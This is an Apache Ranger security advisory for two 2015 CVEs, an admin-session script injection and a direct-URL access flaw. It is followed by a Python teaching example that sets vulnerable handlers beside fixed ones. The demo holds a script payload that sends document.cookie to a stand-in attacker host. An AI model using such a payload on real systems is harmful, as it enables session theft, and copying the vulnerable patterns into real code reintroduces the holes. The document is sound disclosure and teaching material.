Ranger Community: Please see below details.
CVE-2015-0265: Apache Ranger code injection vulnerability
-------------------------------------------------------------------------------

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: 0.4.0 version of Apache Ranger

Users affected: All admin users of the Ranger policy admin tool

Description: Unauthorized users can send some JavaScript code to be executed in Ranger policy admin tool admin sessions

Fix detail: Added logic to sanitize the user input

Mitigation: Users should upgrade to the 0.5.0+ version of Apache Ranger with the fix

Credit: Thanks to Jakub Kałużny from SecuRing for reporting this issue


CVE-2015-0266: Apache Ranger direct URL access vulnerability
-------------------------------------------------------------------------------

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: 0.4.0 version of Apache Ranger

Users affected: All users of the Ranger policy admin tool

Description: Regular users can type in the URL of modules that are accessible only to admin users

Fix detail: Added logic in the backend to verify user access

Mitigation: Users should upgrade to the 0.5.0+ version of Apache Ranger with the fix

Credit: Thanks to Jakub Kałużny from SecuRing for reporting this issue

Thank you,
Vel
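The two weakness classes named in the advisories above, each beside the shape of fix the advisory describes (output sanitization for CVE-2015-0265, a server-side access check for CVE-2015-0266), as an added illustration. This is example code written for this note, not Apache Ranger's own code, and it does not reproduce Ranger's handlers: the User and Request types, the module path prefixes, the policy-name field and the attacker string are all constructed for the demo.

```python
"""
Added example (not Apache Ranger code). Models the two advisory classes on a
tiny request handler and shows the vulnerable pattern next to the hardened one.

  CVE-2015-0265 class: a value typed by a low-privileged user is echoed into
                       an admin page unescaped, so it runs in admin sessions.
  CVE-2015-0266 class: admin-only modules are reachable by typing their URL
                       because access was only enforced by hiding menu links.

User, Request, ADMIN_ONLY_PREFIXES and the "/policies" module are assumptions
for this demo; none of them are Ranger identifiers.
"""
from dataclasses import dataclass, field
from html import escape


@dataclass
class User:
    name: str
    role: str  # "admin" or "user" (assumed role model)


@dataclass
class Request:
    user: User
    path: str
    params: dict = field(default_factory=dict)


# Assumed module registry: URL prefixes that only admins may use. The backend
# check in the fixed handler consults this on every request.
ADMIN_ONLY_PREFIXES = ("/users", "/audit", "/config")
ALL_MODULE_PREFIXES = ADMIN_ONLY_PREFIXES + ("/policies",)


# --- CVE-2015-0265 class: script injection via unescaped output --------------

def render_policy_row_vulnerable(policy_name: str) -> str:
    """Before: the user-supplied name is concatenated straight into HTML that
    every admin's browser later renders, so markup in it is executed."""
    return "<tr><td>" + policy_name + "</td></tr>"


def render_policy_row(policy_name: str) -> str:
    """After: the value is entity-encoded for the HTML element-content context.
    & < > " ' become entities, so the browser shows text, never markup."""
    return "<tr><td>" + escape(policy_name, quote=True) + "</td></tr>"


def contains_active_markup(html_fragment: str) -> bool:
    """Crude demo check: does the rendered fragment still carry a raw script
    tag or an unescaped event-handler attribute? (A real test would parse the
    DOM; this is enough to show the before/after difference.)"""
    lowered = html_fragment.lower()
    return "<script" in lowered or "onerror=" in lowered


# --- CVE-2015-0266 class: authorization enforced only in the UI --------------

def handle_vulnerable(req: Request) -> int:
    """Before: the server serves any known module path. Only the navigation
    menu was filtered by role, so a regular user who types the URL of an
    admin module gets it. Returns an HTTP-style status code."""
    return 200 if req.path.startswith(ALL_MODULE_PREFIXES) else 404


def handle(req: Request) -> int:
    """After: the role check runs on the server for every request, keyed on
    the requested path, before any module code executes."""
    if req.path.startswith(ADMIN_ONLY_PREFIXES) and req.user.role != "admin":
        return 403
    if req.path.startswith(ALL_MODULE_PREFIXES):
        return 200
    return 404


if __name__ == "__main__":
    # Constructed attacker input: a policy name chosen by a regular user.
    hostile = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'
    print(render_policy_row_vulnerable(hostile))  # script tag reaches admins intact
    print(render_policy_row(hostile))             # rendered as inert text

    alice = User("alice", "user")
    print(handle_vulnerable(Request(alice, "/users/list")))  # 200: admin module served
    print(handle(Request(alice, "/users/list")))             # 403: refused on the server
```

The point of the second half is that removing a link from the menu is not an access control: the check has to be on the code path that serves the module, keyed on the caller's role, so that a hand-typed URL is refused the same way a clicked one would be.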
